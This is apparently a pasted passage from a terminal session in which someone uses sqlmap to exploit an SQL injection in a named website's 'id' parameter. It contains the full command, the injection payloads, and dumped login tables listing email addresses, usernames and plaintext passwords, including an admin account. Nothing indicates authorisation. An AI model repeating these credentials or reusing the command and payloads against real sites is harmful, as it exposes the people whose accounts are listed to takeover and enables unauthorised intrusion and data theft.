- | ope@ope.com | opeyemi | ope | ope | 5 |
- | alf@afafag.com | alfred | alfred | alfred ako | 6 |
- | clementyari@yahoo.com | clement | health | clement | 7 |
- | dally@yahoo.com | davidade | davidally | david | 8 |
- | info@acfmission.org | acfmadmin | eternalhqx5 | ACFM Admin | 9 |
- +-----------------------+-----------+-------------+-----------------+----+
- [09:07:33] [INFO] table 'acfmissi_acfmdb.login' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/login.csv'
- [09:07:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
- root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T userlogin -C Username,Password,ID --dump
- _
- ___ ___| |_____ ___ ___ {1.0.4.0#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 09:12:28
- [09:12:28] [INFO] resuming back-end DBMS 'mysql'
- [09:12:29] [INFO] testing connection to the target URL
- [09:12:30] [INFO] heuristics detected web page charset 'ISO-8859-2'
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
- Payload: id=29 OR NOT 3833=3833#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
- Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
- Type: UNION query
- Title: Generic UNION query (NULL) - 13 columns
- Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ---
- [09:12:30] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.6.31, Apache 2.4.27
- back-end DBMS: MySQL 5.0
- [09:12:30] [INFO] fetching entries of column(s) 'ID, Password, Username' for table 'userlogin' in database 'acfmissi_acfmdb'
- [09:12:31] [INFO] the SQL query used returns 2 entries
- [09:12:32] [INFO] retrieved: "0","xdayox","dayo"
- [09:12:33] [INFO] retrieved: "1","zuwvmuc3","admin_nsiwc"
- [09:12:33] [INFO] analyzing table dump for possible password hashes
- Database: acfmissi_acfmdb
- Table: userlogin
- [2 entries]
- +-------------+----------+----+
- | Username | Password | ID |
- +-------------+----------+----+
- | dayo | xdayox | 0 |
- | admin_nsiwc | zuwvmuc3 | 1 |
- +-------------+----------+----+
- [09:12:33] [INFO] table 'acfmissi_acfmdb.userlogin' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/userlogin.csv'
- [09:12:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
- root@BitCoin:/home/helmi#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement